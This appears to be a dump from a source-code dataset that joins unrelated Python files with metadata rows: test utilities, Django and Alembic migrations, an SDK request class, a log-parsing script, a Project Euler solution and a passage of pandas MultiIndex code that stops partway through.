        # np.asscalar() was removed in NumPy 1.23; ndarray.item() is the
        # documented replacement and returns the same Python scalar.
        return S.item()
    return S
| 20.830986 | 72 | 0.529412 |
992154694fca84a12a87b45f9714c1c9d5ff7674 | 3,498 | py | Python | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | 2 | 2021-10-20T10:24:49.000Z | 2021-12-01T01:53:30.000Z | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | 21 | 2021-07-12T20:06:52.000Z | 2022-02-08T21:48:08.000Z | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | null | null | null | import os
from contextlib import contextmanager
from datetime import date, timedelta
from functools import lru_cache
from random import shuffle
from typing import TYPE_CHECKING, ClassVar, Iterator, Optional, Type, TypeVar
import fsspec
from google.cloud import datastore
from articat.artifact import ID, Partition, Version
from articat.catalog import Catalog
from articat.catalog_datastore import CatalogDatastore
from articat.config import ArticatConfig
from articat.fs_artifact import FSArtifact
T = TypeVar("T", bound="TestFSArtifactMixin")
class TestCatalog(CatalogDatastore):
    """Datastore Catalog used for tests"""

    @classmethod
    @lru_cache
    def _client(
        cls, project: str = "foobar", namespace: Optional[str] = None
    ) -> datastore.Client:
        # Point the Datastore client at the local emulator so tests never
        # touch a real GCP project; lru_cache makes all calls with the same
        # arguments share a single client instance.
        os.environ["DATASTORE_EMULATOR_HOST"] = "127.0.0.1:8099"
        return datastore.Client(project=project, namespace=namespace)
# Under static type checking the mixin pretends to subclass FSArtifact so
# attribute/method access on ``self`` type-checks; at runtime it stays a
# plain mixin (``object``) so it can be combined with any FSArtifact flavour.
if TYPE_CHECKING:
    # NOTE: we want to use TestFSArtifactMixin across multiple
    # test classes, and flavours of FSArtifact
    BASE_CLASS = FSArtifact
else:
    BASE_CLASS = object
class TestFSArtifactMixin(BASE_CLASS):
    # Note: we overwrite str format in tests to avoid partition path conflicts
    # for versioned outputs
    _partition_str_format: ClassVar[str] = "%Y%m%dT%H%M%S%f"

    @classmethod
    def _catalog(cls) -> "Type[Catalog]":
        # Route all catalog operations to the emulator-backed test catalog.
        return TestCatalog

    @classmethod
    @contextmanager
    def dummy_versioned_ctx(
        cls: Type[T], uid: ID, version: Version, dev: bool = False
    ) -> Iterator[T]:
        """Yield a versioned artifact with a single dummy output file staged."""
        with cls.versioned(uid, version, dev=dev) as a:
            with fsspec.open(a.joinpath("output.txt"), "w") as f:
                f.write("ala ma kota")
            a.files_pattern = f"{a.staging_file_prefix}/output.txt"
            yield a

    @classmethod
    def write_dummy_versioned(
        cls: Type[T], uid: ID, version: Version, dev: bool = False
    ) -> T:
        """Create and finalize a dummy versioned artifact, returning it."""
        with cls.dummy_versioned_ctx(uid, version, dev=dev) as a:
            ...
        return a

    @classmethod
    @contextmanager
    def dummy_partitioned_ctx(
        cls: Type[T], uid: ID, partition: Partition, dev: bool = False
    ) -> Iterator[T]:
        """Yield a partitioned artifact with a single dummy output file staged."""
        with cls.partitioned(uid, partition=partition, dev=dev) as a:
            with fsspec.open(a.joinpath("output.txt"), "w") as f:
                f.write("ala ma kota")
            # Sanity check: staging must happen under the configured tmp prefix.
            assert ArticatConfig.fs_tmp_prefix() in a.staging_file_prefix
            a.files_pattern = f"{a.staging_file_prefix}/output.txt"
            yield a

    @classmethod
    def write_dummy_partitioned(
        cls: Type[T], uid: ID, partition: Partition, dev: bool = False
    ) -> T:
        """Create and finalize a dummy partitioned artifact, returning it."""
        with cls.dummy_partitioned_ctx(uid, partition, dev=dev) as a:
            ...
        return a
class TestFSArtifact(TestFSArtifactMixin, FSArtifact):
    """FSArtifact used for tests"""

    __test__: ClassVar[bool] = False
    """
    This field prevents pytest from interpreting TestFSArtifact as
    a test class. Artifact can also check for the existence of
    __test__ to check if it's running in the test context.
    """
def write_a_couple_of_partitions(uid: ID, n: int) -> None:
    """Write ``n`` daily partitions for ``uid`` plus an unrelated dataset."""
    # we shuffle the partitions to further tests ordering etc
    ns = list(range(n))
    shuffle(ns)
    for i in ns:
        # One partition per day, counting back from today.
        dt = date.today() - timedelta(days=i)
        TestFSArtifact.write_dummy_partitioned(uid, dt)
        # write some unrelated dataset
        TestFSArtifact.write_dummy_partitioned(f"{uid}1234", dt)
| 32.091743 | 78 | 0.670669 |
9a327b067a0d36d4754df4890de769bd8d78f2d8 | 2,335 | py | Python | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 19 | 2017-09-04T00:36:52.000Z | 2022-01-24T08:44:22.000Z | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 35 | 2017-10-17T02:36:01.000Z | 2022-03-09T04:46:57.000Z | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 38 | 2017-09-15T14:17:42.000Z | 2021-12-15T17:11:31.000Z | # Generated by Django 2.2.17 on 2021-04-22 18:38
import uuid
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
from django_airavata.apps.auth.models import VERIFY_EMAIL_CHANGE_TEMPLATE
def default_templates(apps, schema_editor):
    """Data migration: seed the default 'verify email change' email template.

    Uses the historical model via ``apps.get_model`` as migrations require;
    ``schema_editor`` is unused but part of the RunPython callback signature.
    """
    EmailTemplate = apps.get_model("django_airavata_auth", "EmailTemplate")
    verify_email_template = EmailTemplate(
        template_type=VERIFY_EMAIL_CHANGE_TEMPLATE,
        subject="{{first_name}} {{last_name}} ({{username}}), "
                "Please Verify Your New Email Address in {{portal_title}}",
        body="""
<p>
Dear {{first_name}} {{last_name}},
</p>
<p>
Before your email address change can be processed, you need to verify
your new email address ({{email}}). Click the link below to verify your email
address:
</p>
<p><a href="{{url}}">{{url}}</a></p>
""".strip())
    verify_email_template.save()
class Migration(migrations.Migration):
    """Add the email-change verification template type and model.

    Extends the EmailTemplate type choices, creates PendingEmailChange to
    track unverified address changes, and seeds the default template.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('django_airavata_auth', '0007_auto_20200917_1610'),
    ]

    operations = [
        # Add choice (5, 'Verify Email Change Template') to template_type.
        migrations.AlterField(
            model_name='emailtemplate',
            name='template_type',
            field=models.IntegerField(choices=[(1, 'Verify Email Template'), (2, 'New User Email Template'), (3, 'Password Reset Email Template'), (4, 'User Added to Group Template'), (5, 'Verify Email Change Template')], primary_key=True, serialize=False),
        ),
        # Track pending (not-yet-verified) email address changes per user.
        migrations.CreateModel(
            name='PendingEmailChange',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email_address', models.EmailField(max_length=254)),
                ('verification_code', models.CharField(default=uuid.uuid4, max_length=36, unique=True)),
                ('created_date', models.DateTimeField(auto_now_add=True)),
                ('verified', models.BooleanField(default=False)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Seed the default template; reversing the migration is a no-op.
        migrations.RunPython(default_templates, migrations.RunPython.noop),
    ]
| 38.916667 | 257 | 0.643255 |
b5b5826fc5f3a62d3a91b26bd49de9e2645ba626 | 2,396 | py | Python | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 18 | 2021-10-10T00:19:59.000Z | 2022-03-22T01:24:58.000Z | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 1 | 2021-12-22T19:37:33.000Z | 2021-12-22T20:52:09.000Z | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 1 | 2022-02-21T15:09:47.000Z | 2022-02-21T15:09:47.000Z | import os,sys
import re,argparse
import os.path as osp
designSet1 = ['i2c','spi','des3_area','ss_pcm','usb_phy','sasc','wb_dma','simple_spi']
designSet2 = ['dynamic_node','aes','pci','ac97_ctrl','mem_ctrl','tv80','fpu']
designSet3 = ['wb_conmax','tinyRocket','aes_xcrypt','aes_secworks']
designSet4 = ['jpeg','bp_be','ethernet','vga_lcd','picosoc']
designSet5 = ['dft','idft','fir','iir','sha256']
homeDir = None
benchDataFolder = None
statsDataFolder = None
designs = designSet1+designSet2+designSet3+designSet4+designSet5
NUM_SYNTHESIZED_DESIGNS = 1500
csvDelimiter = ","
designSet = designSet1+designSet2+designSet3+designSet4+designSet5
def getFileLines(filePath):
f = open(filePath,'r')
fLines = f.readlines()
f.close()
return fLines
def collectAreaAndDelay():
adpFolder = osp.join(statsDataFolder,"adp")
if not os.path.exists(adpFolder):
os.mkdir(adpFolder)
for des in designs:
desLogDir = osp.join(benchDataFolder,des,"log_"+des)
csv_file = os.path.join(adpFolder, 'adp_'+des+'.csv')
csvFileHandler = open(csv_file,'w+')
csvFileHandler.write("sid,area,delay\n")
for i in range(NUM_SYNTHESIZED_DESIGNS):
synth_stat_file = os.path.join(desLogDir,'log_'+des+"_syn"+str(i)+'.log')
synthFileLines = getFileLines(synth_stat_file)
information = re.findall('[a-zA-Z0-9.]+',synthFileLines[-1])
csvFileHandler.write(str(i)+csvDelimiter+str(information[-9])+csvDelimiter+str(information[-4])+"\n")
csvFileHandler.close()
def setGlobalAndEnvironmentVars(cmdArgs):
global homeDir,benchDataFolder,statsDataFolder
homeDir = cmdArgs.home
if not (os.path.exists(homeDir)):
print("\nPlease rerun with appropriate paths")
benchDataFolder = os.path.join(homeDir,"OPENABC_DATASET","bench")
statsDataFolder = os.path.join(homeDir,"OPENABC_DATASET","statistics")
def parseCmdLineArgs():
parser = argparse.ArgumentParser(prog='Final AIG area and delay Collection', description="Circuit characteristics")
parser.add_argument('--version',action='version', version='1.0.0')
parser.add_argument('--home',required=True, help="OpenABC dataset home path")
return parser.parse_args()
def main():
cmdArgs = parseCmdLineArgs()
setGlobalAndEnvironmentVars(cmdArgs)
collectAreaAndDelay()
if __name__ == '__main__':
main()
| 36.861538 | 119 | 0.702003 |
49ee95dd998d6a46a62aa0a68099b0ef80babadd | 840 | py | Python | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | 7 | 2018-10-17T15:13:05.000Z | 2021-12-10T14:53:38.000Z | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | 208 | 2018-12-28T17:11:00.000Z | 2022-03-29T18:47:23.000Z | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | null | null | null | from django.core.management.base import BaseCommand
import logging
from django.contrib.auth.models import Group
class Command(BaseCommand):
help = 'Creates application-wide permissions and groups'
logger = logging.getLogger(__name__)
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.groups = [
"bidder",
"cdo",
"bureau_ao",
"glossary_editors",
"bidcycle_admin",
"superuser",
"bureau_user",
"ao_user",
"post_user",
]
def handle(self, *args, **options):
for group_name in self.groups:
group = Group.objects.get_or_create(name=group_name)
if group[1]:
self.logger.info(f"Created group {group_name}")
| 26.25 | 64 | 0.578571 |
3e1b52c4b51dd8de73eb0dd715ad76752b3dbfef | 603 | py | Python | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 129 | 2017-08-25T11:45:15.000Z | 2022-03-29T05:11:25.000Z | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 251 | 2017-07-27T10:05:58.000Z | 2022-03-02T12:46:13.000Z | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 20 | 2017-08-13T13:05:14.000Z | 2022-03-19T02:21:37.000Z | """Add hostname column to the resources table
Revision ID: 58a12e45663e
Revises: 06ce06e9bb85
Create Date: 2020-10-20 18:24:40.267394
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58a12e45663e'
down_revision = '06ce06e9bb85'
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table('resources') as batch_op:
batch_op.add_column(sa.Column('hostname', sa.String(length=64), nullable=True))
def downgrade():
with op.batch_alter_table('resources') as batch_op:
batch_op.drop_column('hostname')
| 22.333333 | 87 | 0.74461 |
ef9bd30b7501bb0dd13a1a0c38aad8fefc9664c2 | 1,610 | py | Python | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | 1 | 2021-03-08T02:59:17.000Z | 2021-03-08T02:59:17.000Z | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | 1 | 2020-05-31T14:51:47.000Z | 2020-05-31T14:51:47.000Z | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class GetRecordOssUploadParamRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2017-07-05', 'GetRecordOssUploadParam')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_FileName(self):
return self.get_query_params().get('FileName')
def set_FileName(self,FileName):
self.add_query_param('FileName',FileName) | 36.590909 | 76 | 0.768323 |
3e257987a705a275fde7132f4219c8f8360e7356 | 602 | py | Python | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.db.models import Max
def set_order(sender, instance, **kwargs):
"""If not set, determine and set the instance's order value."""
from .models import OrderMixin
is_order_subclass = issubclass(instance.__class__, OrderMixin)
raw = kwargs.get('raw', False)
if is_order_subclass and not any([instance.pk, instance.order, raw]):
order = instance.__class__.objects.aggregate(
order=Max('order')).get('order')
instance.order = order + 1 if order is not None else 1
| 35.411765 | 73 | 0.694352 |
e3b286be06c7cdde074647e23434bbc9a31b0519 | 637 | py | Python | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | import pytest
from spojit.util import date_time_to_timestamp
from spojit.util import resource_similarity
def test_date_time_to_timestamp():
assert 1497967200 == date_time_to_timestamp("2017-06-20T16:00:00Z")
def test_resource_similarity():
assert pytest.approx(0.5, 0.01) == resource_similarity(
["a", "b", "c", "d"], ["a", "c", "e"]
)
assert pytest.approx(0.5, 0.01) == resource_similarity(
["a", "c", "e"], ["a", "b", "c", "d"]
)
assert pytest.approx(0.0, 0.01) == resource_similarity(["a", "a"], ["b"])
assert pytest.approx(0.5, 0.01) == resource_similarity(["a", "a"], ["b", "a"])
| 27.695652 | 82 | 0.616954 |
ed84901f3b1d1e91252a6f743abe5ddd8fab5dff | 155 | py | Python | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | shaido987/pyaf | b9afd089557bed6b90b246d3712c481ae26a1957 | [
"BSD-3-Clause"
] | 377 | 2016-10-13T20:52:44.000Z | 2022-03-29T18:04:14.000Z | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | ysdede/pyaf | b5541b8249d5a1cfdc01f27fdfd99b6580ed680b | [
"BSD-3-Clause"
] | 160 | 2016-10-13T16:11:53.000Z | 2022-03-28T04:21:34.000Z | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | ysdede/pyaf | b5541b8249d5a1cfdc01f27fdfd99b6580ed680b | [
"BSD-3-Clause"
] | 63 | 2017-03-09T14:51:18.000Z | 2022-03-27T20:52:57.000Z | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['MovingMedian'] , ['NoCycle'] , ['AR'] ); | 38.75 | 82 | 0.748387 |
aae53f91690d7960fdfa06cb9d005dc42e31a3a9 | 1,108 | py | Python | twisted/conch/ssh/address.py | sxamit/twisted | 30f6966329c857c3631c60aeb420d84d7828e01e | [
"MIT",
"Unlicense"
] | 1 | 2017-08-07T14:52:02.000Z | 2017-08-07T14:52:02.000Z | Lib/site-packages/twisted/conch/ssh/address.py | adzhou/Python27 | a7113b69d54a04cc780143241c2f1fe81939ad3a | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/twisted/conch/ssh/address.py | adzhou/Python27 | a7113b69d54a04cc780143241c2f1fe81939ad3a | [
"bzip2-1.0.6"
] | 1 | 2018-11-07T12:52:07.000Z | 2018-11-07T12:52:07.000Z | # -*- test-case-name: twisted.conch.test.test_address -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Address object for SSH network connections.
Maintainer: Paul Swartz
@since: 12.1
"""
from zope.interface import implementer
from twisted.internet.interfaces import IAddress
from twisted.python import util
@implementer(IAddress)
class SSHTransportAddress(object, util.FancyEqMixin):
"""
Object representing an SSH Transport endpoint.
This is used to ensure that any code inspecting this address and
attempting to construct a similar connection based upon it is not
mislead into creating a transport which is not similar to the one it is
indicating.
@ivar address: A instance of an object which implements I{IAddress} to
which this transport address is connected.
"""
compareAttributes = ('address',)
def __init__(self, address):
self.address = address
def __repr__(self):
return 'SSHTransportAddress(%r)' % (self.address,)
def __hash__(self):
return hash(('SSH', self.address))
| 23.574468 | 75 | 0.714801 |
c1ded32814009c4305b6ef7c8e51b7e7ba989304 | 247 | py | Python | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/Solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | 3 | 2020-05-09T17:48:49.000Z | 2021-10-09T06:45:41.000Z | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | null | null | null | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | null | null | null | def largest_prime_factor(num, prev_max = 2):
for pos_fact in range(prev_max, num):
if num % pos_fact == 0:
return largest_prime_factor(int(num / pos_fact), pos_fact)
return num
print(largest_prime_factor(600851475143)) | 35.285714 | 70 | 0.696356 |
0c158d47cfa3b98e76b6fbd8861f96500d300d02 | 134,381 | py | Python | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2021-08-30T15:26:32.000Z | 2021-08-30T15:26:32.000Z | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 | 2021-09-05T22:23:43.000Z | 2021-09-07T01:54:50.000Z | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import annotations
from functools import wraps
from sys import getsizeof
from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Hashable,
Iterable,
List,
Sequence,
Tuple,
cast,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import (
algos as libalgos,
index as libindex,
lib,
)
from pandas._libs.hashtable import duplicated
from pandas._typing import (
AnyArrayLike,
DtypeObj,
Scalar,
Shape,
npt,
)
from pandas.compat.numpy import function as nv
from pandas.errors import (
InvalidIndexError,
PerformanceWarning,
UnsortedIndexError,
)
from pandas.util._decorators import (
Appender,
cache_readonly,
deprecate_nonkeyword_arguments,
doc,
)
from pandas.core.dtypes.cast import coerce_indexer_dtype
from pandas.core.dtypes.common import (
ensure_int64,
ensure_platform_int,
is_categorical_dtype,
is_hashable,
is_integer,
is_iterator,
is_list_like,
is_object_dtype,
is_scalar,
pandas_dtype,
)
from pandas.core.dtypes.dtypes import ExtensionDtype
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeIndex,
ABCTimedeltaIndex,
)
from pandas.core.dtypes.missing import (
array_equivalent,
isna,
)
import pandas.core.algorithms as algos
from pandas.core.arrays import Categorical
from pandas.core.arrays.categorical import factorize_from_iterables
import pandas.core.common as com
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import (
Index,
_index_shared_docs,
ensure_index,
get_unanimous_names,
)
from pandas.core.indexes.frozen import FrozenList
from pandas.core.indexes.numeric import Int64Index
from pandas.core.ops.invalid import make_invalid_op
from pandas.core.sorting import (
get_group_index,
indexer_from_factorized,
lexsort_indexer,
)
from pandas.io.formats.printing import pprint_thing
if TYPE_CHECKING:
from pandas import (
CategoricalIndex,
DataFrame,
Series,
)
_index_doc_kwargs = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update(
{"klass": "MultiIndex", "target_klass": "MultiIndex or list of tuples"}
)
class MultiIndexUIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.UInt64Engine):
"""
This class manages a MultiIndex by mapping label combinations to positive
integers.
"""
_base = libindex.UInt64Engine
def _codes_to_ints(self, codes):
"""
Transform combination(s) of uint64 in one uint64 (each), in a strictly
monotonic way (i.e. respecting the lexicographic order of integer
combinations): see BaseMultiIndexCodesEngine documentation.
Parameters
----------
codes : 1- or 2-dimensional array of dtype uint64
Combinations of integers (one per row)
Returns
-------
scalar or 1-dimensional array, of dtype uint64
Integer(s) representing one combination (each).
"""
# Shift the representation of each level by the pre-calculated number
# of bits:
codes <<= self.offsets
# Now sum and OR are in fact interchangeable. This is a simple
# composition of the (disjunct) significant bits of each level (i.e.
# each column in "codes") in a single positive integer:
if codes.ndim == 1:
# Single key
return np.bitwise_or.reduce(codes)
# Multiple keys
return np.bitwise_or.reduce(codes, axis=1)
class MultiIndexPyIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.ObjectEngine):
"""
This class manages those (extreme) cases in which the number of possible
label combinations overflows the 64 bits integers, and uses an ObjectEngine
containing Python integers.
"""
_base = libindex.ObjectEngine
def _codes_to_ints(self, codes):
"""
Transform combination(s) of uint64 in one Python integer (each), in a
strictly monotonic way (i.e. respecting the lexicographic order of
integer combinations): see BaseMultiIndexCodesEngine documentation.
Parameters
----------
codes : 1- or 2-dimensional array of dtype uint64
Combinations of integers (one per row)
Returns
-------
int, or 1-dimensional array of dtype object
Integer(s) representing one combination (each).
"""
# Shift the representation of each level by the pre-calculated number
# of bits. Since this can overflow uint64, first make sure we are
# working with Python integers:
codes = codes.astype("object") << self.offsets
# Now sum and OR are in fact interchangeable. This is a simple
# composition of the (disjunct) significant bits of each level (i.e.
# each column in "codes") in a single positive integer (per row):
if codes.ndim == 1:
# Single key
return np.bitwise_or.reduce(codes)
# Multiple keys
return np.bitwise_or.reduce(codes, axis=1)
def names_compat(meth):
"""
A decorator to allow either `name` or `names` keyword but not both.
This makes it easier to share code with base class.
"""
@wraps(meth)
def new_meth(self_or_cls, *args, **kwargs):
if "name" in kwargs and "names" in kwargs:
raise TypeError("Can only provide one of `names` and `name`")
elif "name" in kwargs:
kwargs["names"] = kwargs.pop("name")
return meth(self_or_cls, *args, **kwargs)
return new_meth
class MultiIndex(Index):
"""
A multi-level, or hierarchical, index object for pandas objects.
Parameters
----------
levels : sequence of arrays
The unique labels for each level.
codes : sequence of arrays
Integers for each level designating which label at each location.
sortorder : optional int
Level of sortedness (must be lexicographically sorted by that
level).
names : optional sequence of objects
Names for each of the index levels. (name is accepted for compat).
copy : bool, default False
Copy the meta-data.
verify_integrity : bool, default True
Check that the levels/codes are consistent and valid.
Attributes
----------
names
levels
codes
nlevels
levshape
Methods
-------
from_arrays
from_tuples
from_product
from_frame
set_levels
set_codes
to_frame
to_flat_index
sortlevel
droplevel
swaplevel
reorder_levels
remove_unused_levels
get_locs
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_product : Create a MultiIndex from the cartesian product
of iterables.
MultiIndex.from_tuples : Convert list of tuples to a MultiIndex.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Index : The base pandas Index type.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/advanced.html>`__
for more.
Examples
--------
A new ``MultiIndex`` is typically constructed using one of the helper
methods :meth:`MultiIndex.from_arrays`, :meth:`MultiIndex.from_product`
and :meth:`MultiIndex.from_tuples`. For example (using ``.from_arrays``):
>>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']]
>>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
See further examples for how to construct a MultiIndex in the doc strings
of the mentioned helper methods.
"""
_hidden_attrs = Index._hidden_attrs | frozenset()
# initialize to zero-length tuples to make everything work
_typ = "multiindex"
_names = FrozenList()
_levels = FrozenList()
_codes = FrozenList()
_comparables = ["names"]
sortorder: int | None
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
levels=None,
codes=None,
sortorder=None,
names=None,
dtype=None,
copy=False,
name=None,
verify_integrity: bool = True,
):
# compat with Index
if name is not None:
names = name
if levels is None or codes is None:
raise TypeError("Must pass both levels and codes")
if len(levels) != len(codes):
raise ValueError("Length of levels and codes must be the same.")
if len(levels) == 0:
raise ValueError("Must pass non-zero number of levels/codes")
result = object.__new__(cls)
result._cache = {}
# we've already validated levels and codes, so shortcut here
result._set_levels(levels, copy=copy, validate=False)
result._set_codes(codes, copy=copy, validate=False)
result._names = [None] * len(levels)
if names is not None:
# handles name validation
result._set_names(names)
if sortorder is not None:
result.sortorder = int(sortorder)
else:
result.sortorder = sortorder
if verify_integrity:
new_codes = result._verify_integrity()
result._codes = new_codes
result._reset_identity()
return result
def _validate_codes(self, level: list, code: list):
"""
Reassign code values as -1 if their corresponding levels are NaN.
Parameters
----------
code : list
Code to reassign.
level : list
Level to check for missing values (NaN, NaT, None).
Returns
-------
new code where code value = -1 if it corresponds
to a level with missing values (NaN, NaT, None).
"""
null_mask = isna(level)
if np.any(null_mask):
code = np.where(null_mask[code], -1, code)
return code
def _verify_integrity(self, codes: list | None = None, levels: list | None = None):
"""
Parameters
----------
codes : optional list
Codes to check for validity. Defaults to current codes.
levels : optional list
Levels to check for validity. Defaults to current levels.
Raises
------
ValueError
If length of levels and codes don't match, if the codes for any
level would exceed level bounds, or there are any duplicate levels.
Returns
-------
new codes where code value = -1 if it corresponds to a
NaN level.
"""
# NOTE: Currently does not check, among other things, that cached
# nlevels matches nor that sortorder matches actually sortorder.
codes = codes or self.codes
levels = levels or self.levels
if len(levels) != len(codes):
raise ValueError(
"Length of levels and codes must match. NOTE: "
"this index is in an inconsistent state."
